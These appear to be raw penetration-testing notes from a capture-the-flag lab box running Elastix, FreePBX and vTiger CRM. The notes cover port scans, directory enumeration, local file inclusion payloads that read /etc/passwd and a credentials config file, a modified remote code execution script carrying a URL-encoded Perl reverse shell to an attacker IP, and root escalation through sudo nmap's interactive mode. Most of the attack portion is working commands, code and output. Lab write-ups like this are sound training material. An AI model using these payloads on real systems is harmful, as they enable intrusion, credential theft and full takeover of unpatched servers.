kali@kali:~$ sudo nmap -sU -sT -T4 --max-retries 0 10.10.10.7
[sudo] password for kali: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 20:28 EDT
Warning: 10.10.10.7 giving up on port because retransmission cap hit (0).
Warning: 10.10.10.7 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.7
Host is up (0.15s latency).
Not shown: 988 open|filtered ports, 779 closed ports, 219 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
443/tcp   open  https
993/tcp   open  imaps
995/tcp   open  pop3s
3306/tcp  open  mysql
4445/tcp  open  upnotifyp
10000/tcp open  snet-sensor-mgmt
111/udp   open  rpcbind
123/udp   open  ntp



kali@kali:~$ nmap -sC -sV 10.10.10.7
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 20:27 EDT
Nmap scan report for 10.10.10.7
Host is up (0.15s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: EXPIRE(NEVER) RESP-CODES TOP STLS AUTH-RESP-CODE PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) UIDL APOP LOGIN-DELAY(0) USER
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ANNOTATEMORE BINARY STARTTLS RIGHTS=kxte CHILDREN URLAUTHA0001 MULTIAPPEND ID THREAD=REFERENCES LISTEXT CONDSTORE IDLE CATENATE ACL Completed LIST-SUBSCRIBED MAILBOX-REFERRALS THREAD=ORDEREDSUBJECT SORT=MODSEQ QUOTA UNSELECT ATOMIC X-NETSCAPE NAMESPACE IMAP4rev1 OK UIDPLUS SORT RENAME NO IMAP4 LITERAL+
443/tcp   open  ssl/https?
|_ssl-date: 2020-07-13T00:34:32+00:00; +3m11s from scanner time.
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 3m10s



kali@kali:~/go/bin$ ./gobuster dir -k --url=https://10.10.10.7 -t 40 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/12 20:47:07 Starting gobuster
===============================================================
/images (Status: 301)
/help (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/mail (Status: 301)
/admin (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/var (Status: 301)
/panel (Status: 301)
/libs (Status: 301)
/recordings (Status: 301)
/configs (Status: 301)
/vtigercrm (Status: 301)
Progress: 197186 / 220561 (89.40%)^C



there's multiple things on this box

elastix, freepbx, vtiger crm

only exploit has exactly match is 

https://10.10.10.7/vtigercrm/

it shows vtiger crm 5.1.0

kali@kali:~$ searchsploit vtiger

vTiger CRM 5.1.0 - Local File Inclusion                                                                           | php/webapps/18770.txt

kali@kali:~$ searchsploit -x php/webapps/18770.txt

it shows try this:
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash


looks like this thing works

on the elastix has a similar one

Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                  | php/webapps/37637.pl

kali@kali:~$ searchsploit -x 37637.pl


/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action


view source will give us a eaiser view

there's bunch of password, one of them is work with root


there's another way to do it

FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                            | php/webapps/18650.py


need to get the extention

kali@kali:~/Downloads/sipvicious/sipvicious$ svwar -m INVITE -e100-300 10.10.10.7
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233       | reqauth        |
+-----------+----------------+


change the script not verify ssl
change the ip and extention etc


import urllib
import ssl

rhost="10.10.10.7"
lhost="10.10.14.41"
lport=1234
extension="233"

ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) 
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# Reverse shell payload

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url, context=ctx)


kali@kali:~/Downloads/sipvicious/sipvicious$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.41] from (UNKNOWN) [10.10.10.7] 37715
id
uid=100(asterisk) gid=101(asterisk)
whoami
asterisk


sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> 
Bogus command -- press h <enter> for help
nmap> id
Unknown command (id) -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)



